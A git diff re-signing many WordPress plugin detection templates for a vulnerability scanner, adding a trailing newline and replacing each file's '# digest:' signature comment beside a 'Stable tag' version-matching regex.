b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index f8b6f42592..99fdcd3941 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b300bfb300b9561595beb75a85edd817ddf12e70e85b92fa4087c7b45727becd02205fbd5f0920204d2a4b0a3b041f9f87640c4d4cf685944afe977ff070c8661a3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200b56676587612443c75c1e8e7618137a84eae0b691c4af3c3f01a065b63da1bc022057847ef6cc4be7cdda3307ac09de252deff7966e459bd3708c73f32c7cf45e33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index bbd55dc866..1e3ce860b7 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201faf8b5bd40e926fc7f31998d85fc4e6d6d1ed38753c60b8ea8cf0b4de7784b2022100a77f2ca80710cce19d320ad1e024ceac014449847e499791922edc319f200f67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221009497e0199ce905393112ed354fb2ee8e36be6e3f38fa1046f073fa42728672d202207b06cb28bdf45deb217cb3968d58bde92974b7c1a93b0b3cf2ce3c963a30902b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 8d00f389b6..183c2d318e 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022006a07f588297aedaf25b2b45e3602795753b603e2f5a23f772613e65e0525edb02202c0a99799332de1fa724d9c96aeec664317d9e25b4631a097feb9d4474fb2224:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202f20f28f868ab7bb5e4e37e4ddcfeee2e68dda1f6786946dbc8a83665a6552da02202985293133c71a33dea9386077081d6eeb49d49c5fdbda057fd959c0155024a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 1df99d8683..3040b0129e 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d557149e618deb5e36a0c85d523961838d6b10d1e053c42e506064767cf9ef310220708810e038ddbbee4731abc0ebd953e11466ab4b3a860e16f1c3c27c0d5438f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a60d357b21c2ff32ead2b5618b33813efeec4d4eb04b43dbc765f5392fdb6a6c022037dd1ef89afd02e1edb11198009bcdb3fd87df082c354cab4b6af2f6cc3baf82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 2820340278..4533e51483 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f1be21e4b10a6c8c7b9c6e14012c6c684730a315f39789524a2b6698116f586102210090ff8145f5f557100896c131bbbb24f4b4c1c088a8a1eae4def1a474b85909c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022045c6f228196cbaeb93ea5bc569ae8b6f1c522c6bd78b3195ae75747a3618fec90221008a9fe97336371d4b8e2d87694d483007f00f7763778f68971efd2e5168b9ab20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index aea9493c7e..7857bfd58b 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fc08a72166df9ac1abc63bc46333794a86b274a96c21154f54b58406947bcc8002206f1aa34bdab1505a3f57b58e13999c3fab1a2dd09195db8e5ac070d76b7d8091:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204b9a7cb707d2509782c20738a4162d16593254e38a672faeafa7bc0a2692828d022100c2d279fa67327698b77d0b23a338c2e61abfbb8dfb4d10d8b3f5a00b66b9772f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 56a6b7e555..410045ee34 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203ce693fc1c8ad499b2029d113df92b997231ccd80561b00ae8c97a181891eb13022100d6e13e2825abc4fc6a13cfe2691fc65a87bc5b4e3ef4ac87cb231d499711cba9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200c7168963df63af56451f3423ae3d22f7248ef6f32e91e235846f0d16b6c3be0022100a380090da807d0140254a251ce2c06594879b2bd6b28512dd8d9dd7e7586c102:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index bc0cee5659..7998a8f405 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a967bf720d7a26fa1ec4f59cd23d94db69ee251408231d294efe7faeebd005420221008ff36d6ffd80dce23ae997cd435e54dad386284e481098c89b517e63decc5254:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205d973e7e09663ee91d032dc452f840a8da6be770952e6a8d59523f8a9ed06b3d022100c0b55a936df28f0a5d90226dddbb2c7e1fc86e5976c42192a6eac91f75399649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 4f90ea9581..2420d62eb3 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200516880140d8cca57a775693355539a509f88457af646d8fcb37b6ca3d95a31d022052970f4fe44585ac6dd7623f9e3d73da7578cc58745abfbe97d2b3e0a552d439:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022053f0ea6be9bf6d9f0bc9538fbd865f15266df7420470c20b9abfc79f1772d9ce022030263cd8550890e07046501e999b377458407a3b908805da372966fc3f47fd75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index b682e09c27..abac1b7bb4 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d666b5d46035ebb6a91d2e9941f9f64ffd6707510ec193512e66bc162b6d6966022100f720cfa80f7d61023a6deaa105d5f5ce51b84623c3e33c51943940a852928ccc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200836a08080c6f60996c21175777f98013a29915322119bf71c84e63b4244fce1022100953dc2653c49a0a9a4408e3f73dda6fff96c471615092ea07064408676b40416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 5399f94a1d..dec8b7e44a 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207ea9fd2e7b7627ee835ed4c3131f71b3384567a755f734700af3cc8e0665fef4022100b4662d82ba647a0e93e75a86404f05cb59151c0f8f9982e012a5a3eddd5db79e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e1fd5b70c9bed3a0d1d5cc698776dd85ce1510cf6f4aca5535cb41cdfb4a7cc002205fa256caf7e1a229e0b280272902122abf1399d0227ce294791bc7beeee93eb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index ce2e076605..5584135846 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205811c10206d443d1e8d318d6342d1f5f0f267ab73bb794d3f67960cb01249db10220373673afc4d681fe6f6ecfe7752c95d48b6f1f24ebd145e278278d441e66aa6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204a9fcbe1131f676698c20838bea3d02b56fc4648e44d6dcbaa44ae0de9c53c1702204d65ed3175abf43132e307b5e57acd0ea5129ce63a3dfcb734acfff945620da2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index e6349f5e6d..70fc5ce0a7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220544ea973bd82f1504924d4eb6d093c1665c26e88217143625607958055e63b5a02201b8fb113e180267aad28e6efa51149244969a21dc8f7a208cd81a8a842d9f4bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ff11245b46e01f2ef6f0841200c03cc78111dd738599a16533aaa83d2e3ffc3d02203f2806466985b71bcf8e5297a5b5497b692f87274f63bdb91b48b80da0609e28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 7a85fd3db6..b2f205c73c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203dbeb002b42773c2b01dab9e7f2fadd9823fab2c60da8f1fe37cbf588999be62022100da1cbf65d38a5a5523ee9c6455360aeaa919d9498f3e210e5ea866c41cec4423:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402201a884d3a6e659bf0f2d79270594548247207fe2802b22046f67caf17758e2e8002202af695c31f891929ca568e6af4a2f3da3c51682d783f2ed96a8dedb6528861cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 97f6c4f003..e2681a30d5 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220084147111dbb04bf6d90dec96c2fa60bf0008f7993940f1cb422000a42724b20022100fb5adf7c617d9bee8354c832b19518da804ffa6169b1e2dc3815ff02d3427a76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a561d1c96818da92b1f59db6539ee53f676440ce2f5128fe2858a6c633871b93022063d698897cf64cc9682af882bba85e4a1de0eeb68cd5549b6f8d04a3e87207ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index b1c68955b1..69c1f0b474 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bcb5b7845e43e80aed9a67dbaa652dc8e55360b6501b104e7a8efecfb3972fca02207399149f020f2bd539d1e92ecf7d4e7f40088994dee2da7ed192e362bd68da87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e704ac2d459c401f877a9c135d403d303e6e3a7b03394554a68c3716fb26fb7b022100a3db090a1434752fafba1b714515e5c0946685012b8eee76f4fdd64cab843f77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index d876d61923..268f123a15 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c3f7b226d52d7d557658ec128adb4a0caa365e78f85cb27ed555e682321042df02204363232462743398a1a89a1aad62efff9f9e8b679aae5150449ff6e835d8c341:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221008220a5038047119840e705a1526e79c402f336761bcd734c314964dafda05878022100a9a51cda7f02631992e4413247f0998a3025e086762f9e2c833c62175b847f94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 1b435f700c..e3f3303b17 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022011952ed49879a5885e1c3d555b42e93503ffd46d66bb015c21b7de99c5a6785502210086b6524897c48f8117baacf5b65eadccd98c0fcc3553afc766620c944a84af2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220688b8d3c1ec1de4c065e7c3e5370b61e092835375e08de455736ee0557a48bb10221009723f9e3aa137b3e0b7dfeea4fb90e4dab2bfeb99285c4c0953db0912e453b84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 178fed26d6..11aaa10881 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022018d92119dec4dbb1af20f5d80c026d4c6d0a49e147b5bccc7daaaf6ea3d5d1a5022045e8bdcbe11fab00368e16de3c56f5f0c3e6868a3d078e9098d0e55872287ff3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204d32353e68eb0a554d272dea6aafecdb720892f7fc3da9c1a7219f0acdcfbe32022020ba0387286f7b50d25100e4fb469b9459461a15aa39f69fb44328b05e81c00f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 1df1d5a883..7fa70df972 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bf2b6e46e2de4748a84d3766584bebaf10a8f4dac7572aefa6f3e8b11b903091022100d9771f7caa6aca6d4dcce6e94f40c7946b1a391adffaf5c5c73935b8496151c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402206456b0b9aa7ca909e6c52773501a633d28676f89759f40dfa9b18d89a007a1510220379e33c7242cd1d3dcaf534b78f34d234c65bd8270a39362b6a06de577e05520:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 56c970ec4b..c2301156ac 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f2e39bf74f14acf8a23e8120f9e3fe8073fec7bb4140f8eb46ed8f872485a4da022058936e522b31af6855d3758140e15857a0f661aaec419785a08e0ef3acfb28c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100cd22f35942f9f6856324352311f8d1986c6a8171bb2dfa017292003e553cc8f2022100e109491f23d11a7cc82c06f93156b451530be0fa27275819f3afb602b95157f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index d0f95d53de..02efa3312d 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200d74b65482fb824a3280813eadc3d9666b4409d7e1935e6c7bdebc6d807a43e702204f109e671815029365fd8f14749d31f0c1d21cbcd0a3da24e662e961c4bcc580:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402201486bbf5ba6ccfef7f20f3f30cbc2757183cb859ce5c1dcbe95e909e007a101802201aa55885fd899d7154a113fde0e253e5721646f1c44eb2c6b5121e72bb432427:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 56b5c43402..f0ed7c1632 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fde13bdf4bac2d58d9c2236c3934e36d6fb8d51967a9c95aba9a4cd387933ea3022100ab25e1012c3c222f6b2d39a841f69069f87aa6337c1a4195aa16573148819587:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220515da2c90f0b9a70746ba0e62de3089ec1bae682950dde9a1e6f97637f1b0321022100da61a8d43300d4593675ed823e01fb58b06592ff567d85ed9ceb319c7b88abdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 0fee4bdfed..21b0bc7c5d 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fd2c7f756f3b95a28dc9f815ce24ea034c201a58a0fa4460632b311ef3e2ecd8022100b8318bf4f290aab56c801acb66518eff51962c243fd4848ae62ae5b5cb6da265:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d7c271dda75a3987875049e70927426704c176c727a872e6d2266694c3b97eca022100bb90fb1a3276dd95c546bed89169481f46e0b25adc80d4a08e9d00b99a055d79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index b93328cede..2e8628b7de 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dfdc2c019588e27c92414b6262e06766d10dab81d5f0e258211a871db3c77f7502204e8cc384d827e11d07f1ce3e772825c2b63d1f366e7106f31d9056aa9b33f1a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200f8279bdc18466ce741990739d2703accb7d03fc0ea020e31ecde00c5960bde1022100d4dc14ca23c75e4551ba26ecb23609fdb1286c1ccb76c9db2155a1f1094b0428:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 47ac1d46d6..d1a0ff1e04 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c3c2abbefbafb712de66fe7f9f24f580b8a238508e8f2fab38da35d34618f11e02207b0aae9497a9d6d101a5fcbf7eb431df31d74eb92404868a86836e8203ec1417:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221008d8b048d7ecf2e43ccfe78a254bffbab6108f67c13cf6319cfcb6bcbcdcf42fb022100e9e1acf70796e1783f00a33e5654af47f3c3ea9ffd408f6725915269703ac608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index cc7b8cbadd..0da202b65a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100effb7f2c602a0cd737f6769b6b780b838b8450509a96c320131a9753f8034e03022068e06c88d2396299e57a92fb2584af6457480b4936b8e2947ffe7139c1888a9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205097cc868f985119ab424b6861984142e3b4cdebcab5c8024078fb17ee5db037022100f570e8be197977f6f898d9cd9a0b3c875fe7bb37fc88621e0fc0b76b2fc2198c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index a47579dcc2..b7ba51106c 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203fcc794a7507fc90557103d4c960b580b0730acab7b4f5654f72e321601e0b7e022100938f8fb98b98fef85bae3689f77f656afb850415bca2e10a6c40f3e717bf9edd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e1a4bad7d54939b6a55768f37ca0b113c35f601e2c8c20733330f61eb4ec03ed022100f8cb81273cc90630ea81870f59c9f11c155ffc4d615f001cce35878249d4b94c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3464192c81..03828c0b33 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008aa22d3d397e1bb93ee1da033c94bf9deafad57c1644775ca755912d95f6792e0221008966448e953055893d3648ceb35b18014f5c68405442aa52b5991b178665c99e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220124ca4e503792f7fd2901c28906674597b0776566e5e6945ed1606887b1afa53022100a9282f4fedffb23bd3fc09a905f173f6421943a0abec38930f9283138c39e0f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index c3464c062b..88b15af2d3 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100acabd390f0bfef9a9354ddf70563d58f4e2cacd0287f0e76fd5e43914fa7b6a1022100afa3501636fdc143240662d96a5a898f989c91997f22a2e32d3708b988f9706c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203a43797857a29fc52a7424ed034e9d75739c49cccbc863159c5ac9af7c121128022100c55fb375a3fd73d60b0b0b93013f757d4650054db98a0675a3f49949842f7580:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 52ddee754d..25e1c929c4 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022100885aff19326c0b209576f760a7d94a936de8ae2ebca8294cab3fc8be40875d45021f6a009303edb1a8bdfc736f914fc758cd9a6311fbe22c348a59d391471ebac9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203765a8bec7ec817e46d4bf6364a87493903fa7fcee5c9342a13687d5947d3711022100da9f627b80ad505d84984c7370916044e76c95d4bbec4d22d0ab75421f3140e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index fcfdcf75a6..19f2db0698 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022050acd29cdc7eb785ed45ead98b1ea04cc5d4ea4a76878bf9eb2b27486d80d9d5022100d4cbb4dc343c54c1f77c708177e3eea941ddd1b2c2257153eff2ccd1aa3c089e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100cb1ebd8027a315672f5b25ba1354c79fa5b16c3479320d60f1a332b774d9afa002205f816eb6dee663088ba038d4b496ad5745851d2bd85ecfe52e3d38614c3297e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 55e17c9331..060df0190b 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205ccb024afaf61955be540ba0c221ff1c1c84afd76bb62a5efa7165a0a886c8d102205d339527fe2f6b09b3ea97988bb577e8248d705d0dcdcaecac35e46e4b8d9867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c33910af098fe474b5f544e48a87e034f648a785015408c11ca5416f457c7e42022100f03933dc77b0e31df446e3d50ad5623b861a8a7de85a4f5c15a596ef514b8056:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index dfc58e5bf1..07d03fbe3f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205e42a9414011dc56d1955c511bacfb9aef5ca953f63354caea3f3ccc83a58035022061353ac750f08a95f926827bda118c962feb05dffb54bf650e17cdbf50376514:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 